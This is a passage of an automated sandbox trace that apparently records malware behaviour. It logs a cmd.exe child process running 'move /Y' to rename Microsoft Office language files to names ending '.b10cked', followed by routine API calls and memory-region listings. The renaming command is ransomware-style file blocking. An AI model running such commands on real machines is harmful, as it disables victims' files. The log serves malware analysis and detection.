[0154.908] GetLastError () returned 0x12 [0154.908] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0154.909] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cc0) returned 0x372130 [0154.910] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0154.910] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0154.910] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll")) returned 0x2020 [0154.910] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0154.911] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0154.911] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e9d0 | out: _Buffer=" 1") returned 9 [0154.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.911] GetFileType (hFile=0x7) returned 0x2 [0154.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0154.911] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e95c | out: lpMode=0x20e95c) returned 1 [0154.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.911] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e990 | out: lpConsoleScreenBufferInfo=0x20e990) returned 1 [0154.912] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0154.912] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e9d0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0154.912] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e9b4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e9b4*=0x1a) returned 1 [0154.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.912] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.912] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.913] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.913] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.913] SetConsoleInputExeNameW () returned 0x1 [0154.913] GetConsoleOutputCP () returned 0x1b5 [0154.913] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.913] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.913] exit (_Code=0) Process: id = "258" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21296 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21297 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21298 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21299 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 21300 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21301 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21302 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21303 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21304 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21305 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21376 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21377 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21378 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21379 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 21380 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 21381 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21382 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21383 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21384 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21385 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21386 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21387 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21388 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21389 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21390 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 21391 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21392 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21393 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21394 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21395 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 21396 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21397 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 21398 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 21399 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 321 os_tid = 0xd34 [0155.089] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcb4 | out: lpSystemTimeAsFileTime=0x1cfcb4*(dwLowDateTime=0x9660dc80, dwHighDateTime=0x1d440a9)) [0155.089] GetCurrentProcessId () returned 0xea4 [0155.089] GetCurrentThreadId () returned 0xd34 [0155.089] GetTickCount () returned 0x2fac2 [0155.089] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcac | out: lpPerformanceCount=0x1cfcac*=21187858478) returned 1 [0155.090] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0155.090] __set_app_type (_Type=0x1) [0155.090] __p__fmode () returned 0x76b331f4 [0155.090] __p__commode () returned 0x76b331fc [0155.090] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0155.090] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0155.091] GetCurrentThreadId () returned 0xd34 [0155.091] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd34) returned 0x38 [0155.091] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0155.091] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0155.091] SetThreadUILanguage (LangId=0x0) returned 0x409 [0155.091] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0155.091] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc44 | out: phkResult=0x1cfc44*=0x0) returned 0x2 [0155.091] VirtualQuery (in: lpAddress=0x1cfc7b, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0155.091] GetConsoleOutputCP () returned 0x1b5 [0155.091] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0155.091] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0155.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.092] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0155.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.092] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0155.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.092] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0155.092] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.092] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0155.092] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.092] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0155.092] GetEnvironmentStringsW () returned 0x370210* [0155.092] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0155.093] GetEnvironmentStringsW () returned 0x370210* [0155.093] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0155.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebb4 | out: phkResult=0x1cebb4*=0x40) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0xa0, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegCloseKey (hKey=0x40) returned 0x0 [0155.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebb4 | out: phkResult=0x1cebb4*=0x40) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegCloseKey (hKey=0x40) returned 0x0 [0155.093] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637d [0155.093] srand (_Seed=0x5b88637d) [0155.093] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"" [0155.093] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"" [0155.094] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.094] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0155.094] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0155.094] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0155.094] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0155.094] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0155.094] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0155.094] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0155.094] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0155.094] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0155.094] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0155.094] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0155.094] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0155.094] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0155.094] GetEnvironmentStringsW () returned 0x372360* [0155.094] FreeEnvironmentStringsW (penv=0x372360) returned 1 [0155.094] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.095] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0155.095] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0155.095] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0155.095] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0155.095] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0155.095] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0155.095] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0155.095] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0155.095] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0155.095] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf980, lpFilePart=0x1cf97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf97c*="Desktop") returned 0x18 [0155.095] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0155.095] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc) returned 0x3709f0 [0155.095] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0155.095] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc) returned 0x3709f0 [0155.095] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0155.096] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc) returned 0x3709f0 [0155.096] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0155.096] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0155.096] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0155.096] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0155.096] GetEnvironmentStringsW () returned 0x370210* [0155.096] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0155.096] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.096] GetConsoleOutputCP () returned 0x1b5 [0155.097] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0155.097] GetUserDefaultLCID () returned 0x409 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="1") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0155.098] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0155.099] 